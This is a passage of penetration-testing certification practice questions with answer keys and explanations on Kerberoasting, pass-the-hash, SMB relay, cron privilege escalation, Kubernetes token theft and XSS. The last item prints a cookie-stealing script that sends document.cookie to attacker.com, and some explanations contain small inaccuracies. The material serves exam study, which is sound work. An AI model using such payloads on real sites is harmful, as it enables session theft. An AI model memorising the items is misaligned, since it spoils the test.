During an internal assessment, a penetration tester captures Kerberos traffic and identifies a service account whose SPN is registered but whose password was set years ago and never rotated. The tester wants to request a service ticket offline and crack it to recover the plaintext password. Which technique is the tester performing?

A.Kerberoasting, by requesting a TGS for the SPN and cracking the RC4-HMAC encrypted portion offline
B.AS-REP roasting, by sending an AS-REQ without pre-authentication for a targeted account
C.Golden Ticket creation, by forging a TGT with the KRBTGT account hash
D.Pass-the-ticket, by injecting a stolen TGS into the current session for lateral movement
AnswerA

Kerberoasting requests a service ticket (TGS) for a registered SPN using any authenticated domain user. The ticket's encrypted portion is protected with the service account's long-term key, so the tester can extract it and crack it offline to recover the plaintext password. The stale, never-rotated password described in the scenario is exactly the condition that makes this attack productive.

Why this answer

Kerberoasting exploits the fact that any authenticated user may request a service ticket for a registered SPN, and the returned TGS is encrypted with the service account's key. Extracting and cracking that encrypted blob offline yields the plaintext password. The long-lived, unrotated password in the scenario is the classic enabling condition, making this the correct identification.

Exam trap

The trap here is confusing offline service-ticket cracking with AS-REP roasting, which instead depends on accounts that have Kerberos pre-authentication disabled.

627
MCQmedium

A penetration tester is calculating the severity of a vulnerability using the DREAD model. Which of the following factors is assessed under the 'Damage' category?

A.The likelihood that an attacker can reproduce the exploit.
B.The potential data loss or system damage that could result from exploitation.
C.How easy it is for an attacker to discover the vulnerability.
D.The number of users affected by the vulnerability.
AnswerB

Severity is fundamentally a measure of the potential adverse consequences of an exploit, such as destruction of data, exposure of sensitive information, or loss of system integrity. Frameworks like CVSS explicitly assess this through impact metrics for confidentiality, integrity, and availability, which directly quantify the degree of harm. Unlike likelihood-oriented factors, damage potential remains a constant property of the vulnerability itself, making it the correct basis for severity calculation.

Why this answer

In the DREAD model, the 'Damage' category specifically assesses the potential harm from a successful exploit, such as data loss, system corruption, or service disruption. Option B correctly captures this by focusing on the impact to confidentiality, integrity, or availability, which is the core of the Damage factor.

Exam trap

The trap here is confusing the 'Damage' category with 'Affected Users' (Option D), as both involve impact, but Damage focuses on the severity of harm to data or systems, while Affected Users counts the number of individuals or systems impacted.

How to eliminate wrong answers

Option A is wrong because the likelihood of reproducing an exploit is assessed under the 'Reproducibility' category, not Damage. Option C is wrong because the ease of discovering a vulnerability falls under the 'Discoverability' category, which evaluates how easily an attacker can find the flaw. Option D is wrong because the number of users affected is considered under the 'Affected Users' category, which measures the scope of impact, not the direct damage to data or systems.

628
Multi-Selecthard

A penetration tester is conducting a vulnerability assessment and wants to minimize false positives. Which THREE actions should the tester take? (Select THREE.)

Select 3 answers
A.Run the same scan multiple times
B.Verify findings manually
C.Cross-reference results with multiple scanners
D.Ignore all high-severity findings initially
E.Use authenticated scanning where possible
AnswersB, C, E

Manual verification involves a human analyst inspecting the actual service, configuration, or response to determine if the scanner's reported condition truly exists and is exploitable. For example, a scanner may flag a TLS version based on advertised ciphers, but manual testing (e.g., checking effective protocols via openssl or reviewing server config) can confirm if the issue is real or a misconfiguration that doesn't apply. This step is the gold standard for eliminating false positives because it applies context, logic, and exploitability assessment that automated tools lack.

Why this answer

Option B (Verify findings manually) is correct because manual validation confirms whether a scanner-detected vulnerability is actually exploitable and present, eliminating false positives that automated tools report due to version banners or heuristics. Option C (Cross-reference results with multiple scanners) is correct because different scanners use distinct detection signatures and logic, so correlating findings across tools (e.g., Nessus, OpenVAS, Qualys) helps filter out tool-specific false positives and increases confidence in true findings. Option E (Use authenticated scanning where possible) is correct because credentialed scans log into the target and inspect actual patch levels, configurations, and installed software rather than inferring from remote banners, dramatically reducing false positives.

Option A (Run the same scan multiple times) is not correct because repetition with the same tool and signatures does not resolve false positives and may simply reproduce the same erroneous results. Option D (Ignore all high-severity findings initially) is not correct because dismissing high-severity findings without validation risks missing genuine critical vulnerabilities and does not address false-positive reduction.

Exam trap

The trap here is that candidates may think running the same scan multiple times (Option A) improves accuracy, but it actually increases noise without validating findings, whereas manual verification and cross-referencing are the proven methods to minimize false positives.

629
MCQmedium

A penetration tester is performing a password cracking task against a dump of NTLM hashes obtained from a Windows domain controller. Which tool would be the most efficient for this task?

A.Hydra
B.John the Ripper
C.Hashcat
D.CrackMapExec
AnswerC

Hashcat is the industry-standard for offline hash cracking, supporting GPU (CUDA/OpenCL) acceleration and highly optimized kernels for NTLM (mode 1000). It offers exhaustive rule-based attack modes, mask attacks, and support for pass-the-hash style hashes. For a penetration tester wanting the fastest NTLM cracking, Hashcat is the correct tool.

Why this answer

Hashcat is a GPU-accelerated password cracker that can crack NTLM hashes quickly, especially with a good wordlist and rules.

630
MCQmedium

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

A.The service account's password hash
B.A valid domain user account
C.Administrator privileges on a domain controller
D.Local administrator access on a client machine
AnswerB

A valid domain user account is the only prerequisite because Kerberos allows any authenticated domain user to request service tickets for any SPN via the TGS-REQ process. The TGS ticket returned is encrypted with the service account's password hash, so the attacker receives the ciphertext needed for offline cracking. This works with standard user privileges, making the attack low-cost and widely applicable once a single low-level account is compromised.

Why this answer

Kerberoasting requires a valid domain account to request TGS tickets for service accounts. No special privileges are needed beyond being authenticated. AS-REP roasting targets users without pre-authentication, not service accounts.

631
MCQmedium

A client requests that the penetration tester deliver the final report in an encrypted format via email. Which encryption method should the tester use to ensure confidentiality?

A.Rely on TLS encryption for the email transport
B.Upload the report to a web server using HTTPS
C.Compress the report in a password-protected ZIP file
D.Use S/MIME or PGP to encrypt the email message
AnswerD

S/MIME and PGP provide end-to-end message-level encryption, so the report remains confidential in transit and at rest in the recipient's mailbox, unlike transport-only TLS. This satisfies the client's explicit requirement to deliver the final penetration test report in encrypted format via email.

Why this answer

The correct option is D: use S/MIME or PGP to encrypt the email message. These are end-to-end message encryption standards that protect the report's contents so only the intended recipient with the corresponding private key can decrypt it, ensuring confidentiality even if the message is stored or intercepted along the way. Option A is insufficient because TLS only encrypts the transport hop between mail servers and does not protect the message at rest or from the mail provider.

Option B changes the delivery method rather than encrypting the emailed report as requested, and HTTPS only secures the download channel. Option C is weak because password-protected ZIP encryption (especially legacy ZipCrypto) is vulnerable to cracking and the password would need separate secure transmission.

632
MCQhard

A penetration tester is writing a return-oriented programming (ROP) exploit for a Linux binary to bypass Data Execution Prevention (DEP). The binary has DEP enabled, but the tester identifies a gadget in a dynamically linked library that is not affected by ASLR. Which condition must be true for the ROP chain to succeed?

A.The library must be loaded at a fixed address
B.The stack must be executable
C.The binary must be compiled with stack canaries
D.The exploit must bypass ASLR for the main binary
AnswerA

A ROP chain requires the attacker to hardcode the addresses of gadgets, which are sequences of instructions ending in `ret`. If the target library (such as libc) is loaded at a predictable, fixed base address because ASLR is disabled for that library, the attacker can compute the exact runtime addresses of those gadgets in advance. This makes the exploit reliable across reboots and processes, even if the main executable's own ASLR is enabled, because the chain never needs to reference the main binary's addresses.

Why this answer

For a ROP chain to succeed when DEP is enabled, the attacker needs to control the execution flow by chaining together gadgets (small instruction sequences ending with a return) that reside in executable memory regions. If a dynamically linked library is not affected by ASLR, it means it is loaded at a fixed, predictable address, allowing the tester to reliably use gadgets from that library without needing to bypass ASLR for that specific module. This fixed address ensures the ROP chain's addresses are valid across runs, which is essential for the exploit to work.

Exam trap

The trap here is that candidates often assume ASLR must be fully bypassed for any exploit to work, but the question specifically isolates a library not affected by ASLR, making the ROP chain viable without bypassing ASLR for the main binary.

How to eliminate wrong answers

Option B is wrong because DEP specifically prevents execution on the stack; if the stack were executable, the attacker could simply inject shellcode directly, making a ROP chain unnecessary. Option C is wrong because stack canaries are a defense against buffer overflow-based stack corruption, not against ROP; ROP chains operate by overwriting return addresses and chaining gadgets, and canaries would only prevent the initial overflow if not bypassed, but they do not affect the success of a ROP chain once the overflow occurs. Option D is wrong because the question states the library is not affected by ASLR, so the ROP chain can use gadgets from that library without needing to bypass ASLR for the main binary; the main binary's ASLR status is irrelevant if the gadgets are in a fixed-address library.

633
MCQmedium

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

A.Error-based SQL injection
B.Boolean-based blind SQL injection
C.UNION-based SQL injection
D.Time-based blind SQL injection
AnswerD

Time-based blind SQL injection is the correct answer because the tester can extract data by injecting conditional expressions that invoke database delay functions, such as `IF(condition, SLEEP(5), 0)` in MySQL or `WAITFOR DELAY '0:0:5'` in MSSQL, and then measuring the application's response time. Sqlmap automatically generates these payloads and uses a statistical threshold to distinguish between true and false conditions based on elapsed time, making it effective when no error messages or content changes are visible. This aligns perfectly with the scenario where the tester used sqlmap and observed time-based behavior.

Why this answer

Time-based blind SQL injection uses conditional delays to infer the truth of queries based on response time.

634
MCQeasy

During a penetration test, the tester identifies a low-risk information disclosure vulnerability in a public-facing web server. The tester includes this finding in the final report. Which component of the risk rating should the tester use to justify the low severity?

A.CVSS base score
B.Exploitability metrics
C.Impact metrics
D.Temporal score
AnswerA

The CVSS base score is the standardized, intrinsic measure of vulnerability severity, computed from a weighted combination of exploitability metrics (attack vector, complexity, privileges, user interaction) and impact metrics (confidentiality, integrity, availability) into a single 0–10 score. Because it is derived without temporal or environmental adjustments, it provides a stable, vendor-neutral baseline for prioritization. A low base score directly reflects that the vulnerability's intrinsic severity is minor, which is why the penetration tester classifies it as low risk. Unlike sub-metrics or optional adjusted scores, the base score is the industry-accepted primary reference for severity ratings.

Why this answer

The CVSS base score is the correct component to justify the low severity because it represents the intrinsic and fundamental characteristics of a vulnerability that are constant over time and across user environments. In this case, the information disclosure vulnerability has a low base score due to factors such as low attack complexity and low impact on confidentiality, which are captured in the base metrics. The base score is the standard starting point for communicating severity, making it the appropriate justification for the low-risk rating in the report.

Exam trap

CompTIA often tests the misconception that exploitability metrics or impact metrics alone determine the severity, when in fact the CVSS base score is the aggregate of both and is the authoritative component for justifying the risk rating in a report.

How to eliminate wrong answers

Option B is wrong because exploitability metrics (e.g., attack vector, attack complexity, privileges required, user interaction) are sub-components of the CVSS base score that influence the overall severity, but they alone do not define the final risk rating; they must be combined with impact metrics to produce the base score. Option C is wrong because impact metrics (e.g., confidentiality, integrity, availability) are also sub-components of the base score and do not independently justify the low severity; the base score integrates both exploitability and impact. Option D is wrong because the temporal score adjusts the base score based on factors that change over time (e.g., exploit code maturity, remediation level, report confidence), but the question asks for the component to justify the low severity at the time of the test, not a future-adjusted score.

635
Multi-Selectmedium

A penetration tester is conducting a post-exploitation phase on a Windows target and wants to dump credentials. Which of the following tools can be used? (Choose TWO.)

Select 2 answers
A.secretsdump.py
B.Mimikatz
C.Nmap
D.Hydra
E.Wireshark
AnswersA, B

secretsdump.py is an Impacket script that extracts credential material from persistent Windows stores: the local SAM hive, cached domain credentials in the SECURITY hive, and NTDS.dit on domain controllers. It remotely reads registry hives (or receives a local hive dump) and uses the System key to decrypt the Boot Key, then outputs LM/NTLM hashes, Kerberos keys, and plaintext cached credentials. This makes it a powerful post-exploitation tool for lateral movement, but it operates on on-disk files rather than live processes.

Why this answer

Mimikatz is a well-known credential dumping tool, and secretsdump.py from Impacket can dump hashes remotely.

636
MCQeasy

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

A.execute
B.launch
C.start
D.run
AnswerD

'run' is the correct command to initiate a selected Metasploit exploit. It is also an alias for 'exploit', but 'run' is more versatile and works for both exploit and auxiliary modules. After setting required options like RHOSTS, RPORT, and PAYLOAD, the 'run' command executes the module and establishes the attack as configured. This command is essential in interactive use and in resource scripts for automation.

Why this answer

The 'run' or 'exploit' command launches the exploit.

637
MCQeasy

After a penetration test, the client's technical team wants to understand the exact steps required to reproduce a cross-site scripting vulnerability found in the web application. In which section of the standard penetration testing report should this information be included?

A.Executive Summary
B.Technical Findings and Recommendations
C.Methodology
D.Appendices
AnswerB

The Technical Findings and Recommendations section is the correct location because it houses the detailed, vulnerability-specific information that a client's technical team needs for validation and remediation. For each finding, it includes the affected asset, severity rating, CVSS vector, full technical description, and precise step-by-step reproduction instructions—often including exact HTTP requests, parameters, and expected responses. This structure allows engineers to independently reproduce the issue, confirm the risk, and verify that fixes work, which is exactly the team's objective.

Why this answer

The Technical Findings and Recommendations section is the correct place for step-by-step reproduction steps because it provides detailed, actionable technical information for the client's technical team. This section typically includes specific payloads, HTTP request/response details, and the exact sequence of user interactions needed to trigger the XSS vulnerability, enabling the team to verify and remediate the issue.

Exam trap

The trap here is that candidates confuse the high-level 'Methodology' section (which describes the overall testing process) with the detailed 'Technical Findings' section, mistakenly thinking reproduction steps belong in the methodology rather than the findings.

How to eliminate wrong answers

Option A is wrong because the Executive Summary is a high-level overview for non-technical stakeholders, focusing on business impact and risk ratings, not detailed reproduction steps. Option C is wrong because the Methodology section describes the overall testing approach and tools used (e.g., OWASP ZAP, Burp Suite), not the specific steps for a single vulnerability. Option D is wrong because Appendices contain supplementary material like raw scan outputs or log excerpts, but the primary, structured reproduction steps belong in the main body of the Technical Findings section.

638
MCQmedium

During a penetration test, a tester has access to a Windows domain-joined machine. The tester finds that the machine is running a service that uses named pipes for interprocess communication. The tester wants to perform a relay attack to capture authentication credentials. Which of the following conditions is necessary for an SMB relay attack to succeed?

A.SMB signing must be disabled or not enforced
B.The attacker must be on the same subnet
C.The target must have a publicly available SMB share
D.The attacker must have admin privileges on the relay machine
AnswerA

SMB signing must be disabled or not enforced. When SMB signing is enforced, every message is cryptographically signed using the session key derived from the NTLM handshake; a relayed authentication packet can be forwarded, but the subsequent signed traffic from the attacker cannot be validated by the target server because the attacker never learns the session key. If signing is disabled or only opt-in (not enforced), the server accepts unsigned messages, allowing the attacker to relay the authentication and then freely modify or inject SMB commands. Therefore, this is the primary technical condition that must exist for an NTLM relay to a Windows target to succeed.

Why this answer

SMB relay attacks work by intercepting an authentication attempt and forwarding it to a target server. For the relay to succeed, the target server must not require SMB signing, because signing ensures that the relayed authentication packet is cryptographically bound to the original session, preventing the attacker from replaying it. When SMB signing is disabled or not enforced, the relayed authentication is accepted as valid, allowing credential capture.

Exam trap

CompTIA often tests the misconception that SMB relay requires the attacker to be on the same subnet or have admin privileges, but the critical technical condition is the absence of SMB signing enforcement on the target server.

How to eliminate wrong answers

Option B is wrong because SMB relay attacks can be performed across subnets as long as the attacker can route the traffic between the victim and the target server; being on the same subnet is not a requirement. Option C is wrong because the target does not need a publicly available SMB share; the relay works against any SMB server that accepts authentication, even if no shares are accessible. Option D is wrong because the attacker does not need admin privileges on the relay machine; the relay is performed from the attacker's machine or a controlled system, and the attack succeeds based on network position and protocol weaknesses, not local administrative rights.

639
MCQmedium

A penetration tester is using theHarvester tool to gather email addresses and subdomains for a target domain. Which source is theHarvester commonly configured to use for passive reconnaissance?

A.Shodan
B.Google search
C.DNS zone transfer
D.Social media APIs
AnswerB

Google search is a primary source for theHarvester, as it uses search engine queries to passively scrape email addresses and subdomains from indexed pages without interacting directly with target infrastructure. The tool constructs Google dork-like queries (e.g., site:domain.com) and parses results, making it a purely passive OSINT technique for initial reconnaissance.

Why this answer

TheHarvester is a passive reconnaissance tool that collects emails, subdomains, and other data from public sources without directly interacting with the target. Google search is a primary source because theHarvester uses Google's search engine via its API or scraping to find indexed pages containing email addresses and subdomains, leveraging Google's dorking capabilities for passive data gathering.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates confuse Shodan (a passive search engine for devices) with theHarvester's passive email/subdomain gathering, or assume DNS zone transfer is passive when it is an active query that requires direct server interaction.

How to eliminate wrong answers

Option A is wrong because Shodan is a search engine for internet-connected devices and services, used for active or passive scanning of open ports and banners, not for harvesting emails or subdomains from web content. Option C is wrong because DNS zone transfer is an active reconnaissance technique that attempts to retrieve the entire DNS zone file from a nameserver, requiring direct interaction and often failing due to security restrictions, whereas theHarvester focuses on passive methods. Option D is wrong because while social media APIs can provide user data, theHarvester's default configuration does not commonly use them; it primarily relies on search engines like Google, Bing, and Yahoo for passive email and subdomain discovery.

640
MCQhard

A penetration tester is performing passive reconnaissance on a target organization. The tester wants to identify internal IP address ranges used by the organization without interacting directly with their network. Which of the following techniques would be most effective for this purpose?

A.Querying public BGP route databases and looking up the organization's autonomous system (AS) number
B.Performing a DNS zone transfer against the target's authoritative DNS servers
C.Using Shodan to search for devices from the target organization
D.Sending ARP requests on the local network segment to discover hosts
AnswerA

Public BGP route databases such as RADb, BGPMon, or Hurricane Electric's BGP toolkit aggregate the routing announcements made by organizations' autonomous systems. By identifying the target's ASN, a tester can enumerate all public IP prefixes the organization advertises into the global routing table, including netblocks for data centers, WAN links, or cloud-hosted segments. This method is fully passive because it only queries third-party public data stores and never sends packets to the target's own infrastructure.

Why this answer

Querying public BGP route databases (e.g., RADB, ARIN) using the organization's AS number allows a tester to retrieve IP prefixes announced by the target. This is passive reconnaissance because it uses publicly available routing data without sending any packets to the target's network, making it ideal for identifying internal IP ranges from an external perspective.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates confuse DNS zone transfers (which are active and often restricted) with passive DNS lookups, or assume Shodan is always passive when it actually relies on active scanning data from the past.

How to eliminate wrong answers

Option B is wrong because a DNS zone transfer (AXFR) is an active technique that requires direct interaction with the target's authoritative DNS servers; it is not passive and often fails due to security restrictions. Option C is wrong because using Shodan involves querying a search engine that has previously scanned the target's public-facing devices, which is technically passive but relies on historical scan data and may not reveal internal IP ranges not exposed to the internet. Option D is wrong because sending ARP requests is an active, link-local discovery method that requires being on the same broadcast domain as the target, which is not passive and not feasible during external reconnaissance.

641
MCQhard

During a penetration test, a tester gains access to a Linux server as a low-privileged user. The server has a cron job that executes a script owned by root but writable by the tester's group. Which privilege escalation technique should the tester use?

A.Kernel exploit
B.Misconfigured sudo permissions
C.Cron job exploitation via script modification
D.Path hijacking in the cron job
AnswerC

The cron job runs as root and executes a script that is owned by root but writable by the tester's group. Because the tester can modify the script's contents, they can inject an attacker-controlled command (e.g., a reverse shell or a command to modify /etc/passwd) that will be executed with root privileges when the cron job next triggers. This direct file modification bypasses any restrictions on interactive login and provides identical privileges to the cron job's owner, making it a simple, reliable privilege escalation path.

Why this answer

The cron job executes a script owned by root but writable by the tester's group. This means the tester can modify the script's contents. When the cron job runs (as root), the modified script executes with root privileges, allowing the tester to gain a root shell or execute arbitrary commands as root.

This is a classic cron job exploitation via script modification.

Exam trap

The trap here is that candidates may confuse path hijacking (which exploits an unqualified command in the script) with direct script modification (which exploits writable permissions on the script file itself), but the question explicitly states the script is writable, making modification the correct choice.

How to eliminate wrong answers

Option A is wrong because a kernel exploit targets vulnerabilities in the Linux kernel itself, but the scenario describes a misconfigured file permission (writable script) rather than a kernel bug. Option B is wrong because misconfigured sudo permissions would require the tester to have sudo access or a sudoers entry, which is not mentioned; the attack vector here is a writable cron script, not sudo. Option D is wrong because path hijacking in a cron job involves manipulating the PATH environment variable to execute a malicious binary instead of the intended one, but the scenario explicitly states the script itself is writable, so modifying the script directly is the more direct and reliable technique.

642
MCQhard

A penetration tester is analyzing a Python script that imports the 'scapy' library. The script defines a function that sends a series of TCP SYN packets to a target IP and port range, and then waits for SYN-ACK responses. Which attack is the script performing?

A.TCP SYN flood
B.Port scanning
C.ARP poisoning
D.DNS spoofing
AnswerB

The script's behavior aligns with a TCP SYN scan (half-open scan), a core port scanning technique that sends a SYN packet to each target port and listens for a SYN-ACK (open) or RST (closed). By never sending the final ACK, the scanner avoids establishing a full connection, reducing its footprint and speed while still identifying listening services. This is a standard reconnaissance method in penetration testing, as it maps the exposed attack surface and reveals which TCP ports warrant further probing or vulnerability analysis.

Why this answer

The script sends TCP SYN packets to a range of ports and waits for SYN-ACK responses. This is the classic behavior of a SYN scan, a type of port scanning that identifies open ports by observing which ports respond with a SYN-ACK. The use of Scapy to craft and send these packets confirms the script is performing port scanning, not a denial-of-service attack.

Exam trap

The trap here is confusing a TCP SYN flood (a denial-of-service attack that sends many SYN packets without completing handshakes) with a SYN scan (a reconnaissance technique that sends SYN packets and analyzes responses to identify open ports).

How to eliminate wrong answers

Option A is wrong because a TCP SYN flood aims to overwhelm a target with a high volume of SYN packets, exhausting resources and causing denial of service; the script described waits for SYN-ACK responses, which is not characteristic of a flood attack. Option C is wrong because ARP poisoning involves sending forged ARP replies to associate the attacker's MAC address with the IP of another host on a local network, which is unrelated to sending TCP SYN packets to a range of ports. Option D is wrong because DNS spoofing involves corrupting DNS responses to redirect traffic to malicious sites, which does not involve sending TCP SYN packets to a target IP and port range.

643
MCQmedium

A penetration tester needs to perform a dictionary attack against an SSH service. Which of the following tools is best suited for this task?

A.CrackMapExec
B.John the Ripper
C.Hashcat
D.Hydra
AnswerD

Hydra is the correct choice because it is a network login cracking tool designed specifically for online brute-force and dictionary attacks against live services. It supports SSH and dozens of other protocols, and its parallelized connection handling allows rapid testing of password lists against a remote target. Hydra sends actual authentication requests to the SSH daemon, making it the only listed option capable of performing an active dictionary attack against a running service.

Why this answer

Hydra is a versatile online brute-force tool that supports many protocols, including SSH.

644
MCQmedium

A penetration tester has obtained the NTLM hash of a local administrator account on a Windows domain-joined system. The tester wants to use this hash to authenticate to another system on the network and execute commands remotely. Which tool is commonly used for pass-the-hash attacks to achieve remote code execution?

A.Hydra
B.Impacket's wmiexec.py
C.PsExec
D.Sqlmap
AnswerB

Impacket's wmiexec.py is the correct choice because it directly supports pass-the-hash via the -hashes option, accepting the LM:NTLM hash and using it to authenticate to the target's Windows Management Instrumentation (WMI) service. WMI remoting operates over DCOM/Windows Remote Management, and wmiexec.py leverages the WMI protocol to create remote processes and return their output via a semi-interactive shell. This allows command execution using only the NTLM hash, without needing a plaintext password or any token injection step.

Why this answer

Impacket's wmiexec.py is the correct tool because it directly supports pass-the-hash (PtH) authentication using NTLM hashes over Windows Management Instrumentation (WMI). It accepts an NTLM hash via the `-hashes` flag and establishes a remote WMI session, enabling command execution without needing the plaintext password. This makes it ideal for lateral movement in a domain environment where a local administrator hash has been captured.

Exam trap

CompTIA often tests the distinction between tools that require plaintext credentials versus those that can operate directly with NTLM hashes, leading candidates to mistakenly choose PsExec because it is a well-known remote execution tool, even though it does not natively support pass-the-hash without additional credential injection steps.

How to eliminate wrong answers

Option A (Hydra) is wrong because it is a network login cracker that performs brute-force or dictionary attacks against authentication services, not a pass-the-hash tool; it requires plaintext passwords, not NTLM hashes. Option C (PsExec) is wrong because while it can execute commands remotely, it does not natively support pass-the-hash; it requires a plaintext password or a valid Kerberos ticket, and using an NTLM hash directly would require additional tools like Mimikatz to inject the hash into the session. Option D (Sqlmap) is wrong because it is a SQL injection exploitation tool, completely unrelated to Windows authentication or remote command execution via NTLM hashes.

645
MCQhard

A vulnerability scanner reports a reflected XSS vulnerability in a web application. Manual testing confirms that the application HTML-encodes all user input in the response. Which scanner misconfiguration is MOST likely causing this false positive?

A.The scanner used a POST request instead of a GET request for the payload
B.The scanner's payload was reflected in a different context not subject to HTML encoding
C.The scanner used a payload with special characters that were truncated by the server
D.The scanner's payload triggered a server error that echoed back the input without encoding
AnswerD

When a scanner payload triggers an unhandled exception, the application's error handler may render a stack trace or generic error page that echoes back the offending input without applying the output encoding used by normal templates. The scanner observes its payload reflected verbatim in the response and flags it as XSS, but the vulnerability exists only in the error-handling path, which may not be reachable or exploitable under normal conditions. This is a well-known source of false positives because error pages often bypass security headers and encoding filters. Manual testing shows the normal pages encode all output, so this anomalous reflection is the likely explanation for the scanner's report.

Why this answer

A server error that echoes back the unencoded input bypasses the application's normal HTML-encoding logic. In this scenario, the vulnerability scanner detects the reflected payload in the error response, which is not subject to the same encoding as the application's standard output. This creates a false positive because the reflected XSS is not exploitable through the normal application flow, but only through an error condition that the scanner inadvertently triggered.

Exam trap

CompTIA often tests the distinction between a vulnerability being present in an error response versus the normal application flow, tricking candidates into thinking any reflection of input confirms XSS without considering the response context.

How to eliminate wrong answers

Option A is wrong because the HTTP method (POST vs GET) does not affect whether input is HTML-encoded in the response; encoding is applied server-side regardless of the request method. Option B is wrong because if the payload were reflected in a different context not subject to HTML encoding, the finding would be a true positive, not a false positive. Option C is wrong because truncation of special characters would likely prevent the payload from being reflected at all, or would break the XSS vector, leading to a false negative rather than a false positive.

646
MCQmedium

A penetration tester is conducting active reconnaissance on a target network and wants to perform a SYN scan to identify open ports without completing the full TCP handshake. Which Nmap flag should the tester use?

A.-sS
B.-sA
C.-sU
D.-sT
AnswerA

The -sS option initiates a TCP SYN scan, often called a half-open scan, because it never completes the three-way handshake. The scanner sends a SYN packet and evaluates the response: a SYN/ACK marks the port as open, while an RST indicates closed. This technique is faster and less likely to be logged by application daemons, though it still requires raw packet privileges and can be detected by modern IDS/IPS.

Why this answer

The -sS flag specifies a SYN scan, which is stealthy and does not complete the three-way handshake.

647
Multi-Selectmedium

A penetration tester is reviewing a Java application for insecure deserialization vulnerabilities. Which of the following should the tester look for? (Choose TWO.)

Select 2 answers
A.Accepting serialized objects from user input without sanitization
B.Use of eval() functions
C.Hardcoded credentials in configuration files
D.Use of prepared statements for SQL queries
E.Use of ObjectInputStream without validation
AnswersA, E

The application's deserialization endpoint accepts a raw byte stream from the client and reconstructs objects without any validation or integrity check. An attacker can craft a malicious serialized payload containing a 'gadget chain' of existing library classes, causing the JVM to execute arbitrary commands during object reconstruction. Sanitizing the raw bytes or validating the incoming object's class hierarchy is essential; without it, the attack surface is fully exposed.

Why this answer

Insecure deserialization vulnerabilities often arise from using ObjectInputStream without filtering and from accepting serialized data from untrusted sources.

648
MCQhard

During an internal penetration test, a tester compromises a server that is part of a Kubernetes cluster. The tester has access to the node's operating system but not to the cluster's administrative credentials. Which of the following techniques would most likely allow the tester to escalate privileges to cluster-admin or access sensitive resources within the cluster?

A.Extracting a service account token from a running container and using it to access the Kubernetes API
B.Exploiting a kernel vulnerability on the node to escape to the host and then compromise the Kubernetes API server
C.Searching for a kubeconfig file on the node that contains a cluster-admin token
D.Modifying a ConfigMap to inject a malicious pod that runs with elevated privileges
AnswerA

Inside the compromised container, a JWT-bearing service account token is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token along with the CA certificate and namespace. Reading these files lets the tester authenticate to the kube-apiserver using the pod's service account identity. If that service account is bound to an RBAC ClusterRoleBinding (e.g., cluster-admin), the attacker immediately gains full cluster control, making this the most direct and reliable escalation path from a compromised pod.

Why this answer

Service account tokens are automatically mounted into pods at /var/run/secrets/kubernetes.io/serviceaccount/token. An attacker with node-level access can extract this token from a running container's filesystem and use it to authenticate to the Kubernetes API server. Since service accounts are often granted broad permissions via RBAC bindings, this token may allow the tester to access sensitive resources or even escalate to cluster-admin if the service account has such privileges.

Exam trap

The trap here is that candidates may assume kernel exploits (Option B) are always the best escalation path, but in Kubernetes, the service account token is a simpler and more direct method to access the API server from a compromised node.

How to eliminate wrong answers

Option B is wrong because exploiting a kernel vulnerability to escape to the host is unnecessary—the tester already has node-level OS access. Even after escaping, compromising the API server would require network access and authentication, which is not directly achieved by a kernel exploit. Option C is wrong because kubeconfig files on a node typically contain only node-level credentials (e.g., kubelet client certificates), not cluster-admin tokens; cluster-admin tokens are rarely stored on worker nodes.

Option D is wrong because modifying a ConfigMap cannot directly inject a pod; ConfigMaps store configuration data, not pod definitions. To create a malicious pod, the tester would need API server access, which is the goal, not the method.

649
MCQhard

During an internal penetration test, a tester gains access to a domain-joined Windows 10 workstation as a local administrator. The tester wants to escalate privileges to Domain Admin. Which attack involves requesting Kerberos service tickets that can be cracked offline to reveal the plaintext password of a service account?

A.Pass-the-hash
B.Kerberoasting
C.Golden ticket
D.Silver ticket
AnswerB

This attack requests and cracks Kerberos service tickets to obtain service account passwords.

Why this answer

Kerberoasting is the correct attack because it involves requesting Kerberos service tickets (TGS-REP) for service accounts registered with Service Principal Names (SPNs) in Active Directory. These tickets are encrypted with the service account's NTLM hash, which can be cracked offline to reveal the plaintext password. Since the tester has local administrator access on a domain-joined workstation, they can use tools like Rubeus or Impacket to request these tickets without needing domain admin privileges initially.

Exam trap

CompTIA often tests Kerberoasting by contrasting it with pass-the-hash, where candidates mistakenly think pass-the-hash involves cracking hashes offline, but it actually reuses the hash directly for authentication without offline cracking.

How to eliminate wrong answers

Option A (Pass-the-hash) is wrong because it reuses an NTLM hash to authenticate without cracking it, not requesting Kerberos service tickets for offline cracking. Option C (Golden ticket) is wrong because it forges a Kerberos Ticket Granting Ticket (TGT) using the KRBTGT account hash, not requesting service tickets for offline cracking. Option D (Silver ticket) is wrong because it forges a service ticket for a specific service using the service account's hash, not requesting and cracking tickets offline.

650
Multi-Selectmedium

A penetration tester is performing initial reconnaissance on a target domain. Which THREE sources can provide historical data about the target? (Select THREE.)

Select 3 answers
A.Wayback Machine
B.Pastebin
C.Shodan
D.Certificate Transparency logs (crt.sh)
E.Nmap
AnswersA, B, D

The Wayback Machine, operated by the Internet Archive, captures and archives web pages at various points in time, allowing a penetration tester to retrieve old versions of a target's website. This is valuable for discovering historical content, previously exposed endpoints, old default pages, or configuration files that were later removed but may still be active or reveal security misconfigurations. Because these snapshots are timestamped, the tester can track changes over time and pinpoint when certain technologies or vulnerabilities were introduced. Unlike live tools, it provides a passive, non-intrusive source of historical data.

Why this answer

The Wayback Machine archives web pages, Pastebin may contain leaked historical data, and certificate transparency logs (crt.sh) provide historical certificate issuance data.

651
MCQmedium

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.SQL injection
AnswerB

Reflected XSS is correct because the injected script travels in the HTTP request—for example, inside a query string, form parameter, or URL fragment—and the server immediately reflects it in the HTTP response without proper sanitization, causing the browser to execute it. Since the payload is not persisted, the attacker typically crafts a malicious link with the payload embedded and tricks the victim into clicking it, making non-persistent delivery the defining characteristic that matches the observed behavior.

Why this answer

